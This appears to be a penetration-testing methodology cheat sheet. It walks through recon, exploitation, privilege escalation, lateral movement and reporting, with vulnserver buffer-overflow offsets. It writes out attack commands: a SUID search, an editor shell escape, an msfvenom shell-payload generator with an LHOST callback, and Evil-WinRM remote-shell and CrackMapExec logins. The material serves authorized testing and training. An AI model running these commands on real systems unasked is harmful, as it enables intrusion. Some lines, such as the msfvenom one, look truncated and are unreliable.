Pentest Workbench

Quick Start

1. Define scope — target, rules of engagement, goals
2. Recon — passive OSINT, network enumeration
3. Identify — find vulnerabilities, misconfigs, weak points
4. Exploit — leverage findings with appropriate technique
5. Document — record steps, evidence, impact, remediation

Core Workflow

Phase 1: Recon & Enumeration

• Network OSINT: Use nmap, masscan, rustscan for port discovery
• Passive OSINT: Subdomain enum, WHOIS, Shodan, Censys, Google dorking
• Web recon: Dirbuster, ffuf, Burp Suite crawler
• For vulnerable targets: Netcat manual command probing first

Tools from linked repos:

• netstalking-osint — automated OSINT recon workflows
• Pentest-Tools (40+ categories) — scanner/framework discovery, network_enum

Phase 2: Vulnerability Analysis

• Web: WPScan for WordPress, sqlmap for SQLi, Burp for auth bypass
• Network: nmap NSE scripts, Metasploit, searchsploit
• Binary: IDA/Ghidra for RE, checksec for mitigations
• Config reviews: weak permissions, default creds, exposed secrets

Phase 3: Exploitation

Buffer Overflow (vulnserver pattern):

1. Send oversized input to identify crash point
2. Control EIP with offset measurement
3. Find stable jump (JMP ESP / call esp)
4. Generate shellcode (msfvenom / custom)
5. Execute with proper alignment

Web:

• SQLi → sqlmap or manual union/boolean
• XSS → Beef/XSS Hunter
• RCE → reverse shell via pentest-tools

Privesc (GTFOBins):

# Check sudo/suid binaries
sudo -l
find / -perm -4000 2>/dev/null

# Shell escape from restricted editor
:!/bin/bash

AD Attacks (Pentest-Tools):

• Kerberoasting, AS-REP roasting, SMB relay
• BloodHound/Sharphound enum → Golden/DFSRM

Phase 4: Post-Exploitation

• Cowrie honeypot: analyze attacker sessions for TTPs
• Privilege escalation: kernel exploits, sudo abuse, service misconfigs
• Persistence: scheduled tasks, services, SSH keys
• Lateral movement: PsExec, WMI, SMB, Pass-the-Hash

Phase 5: Documentation

• Steps reproducible by another tester
• Evidence: screenshots, packet captures, log output
• Impact: CVSS score, business risk
• Remediation: specific, actionable fixes

Key References

• Binary exploitation: See references/buffer-overflow.md (vulnserver anatomy, exploit dev)
• Privesc: See references/privesc.md (GTFOBins/LOLBAS, Linux/Windows escalation)
• Tool inventory: See references/tools-inventory.md (all linked tools catalogued)
• pwn.college: CTF exercises for memory corruption, ROP, kernel fundamentals

Exploit Dev (vulnserver)

Vulnserver runs on port 9999. Vulnerable commands:

Command	Trigger Function	Buffer Size	Overflow Offset
TRUN	Function3	2000	~2003 (EIP at ~2007)
GMON	Function3	2000	Similar to TRUN
KSTET	Function2	60	~64
GTER	Function1	140	~144
LTER	Function3	2000	Via transformation
HTER	Function4	1000	Hex-encoded

Key insight: essfunc.dll EssentialFunc10-14 also use strcpy into small buffers (140, 60, 2000, 2000, 1000).

Exploit strategy:

1. Find offset with pattern_create / mona.py
2. Confirm EIP control
3. Locate or craft a ROP chain if ASLR/DEP present
4. Generate alphanumeric shellcode if bad chars restrict ASCII
5. Use egghunter if space is small

Tool Quick Ref

Tool	Purpose	Key Command
nmap	Port enum	nmap -sCV -p- -T4 target
Burp Suite	Web testing	Proxy, Repeater, Intruder
sqlmap	SQL injection	sqlmap -r req.txt --batch
msfvenom	Shellcode gen	msfvenom -p linux/x64/shell_tcp LHOST=x R
CrackMapExec	AD attacks	cme smb target -u user -p pass
Evil-WinRM	Remote shell	evil-winrm -i target -u user -p pass

Mindset

• Methodical > flashy — good recon beats brute force
• Always document as you go — screenshot everything
• Understand the payload — not just "it works"
• Think like defender — what would stop this attack?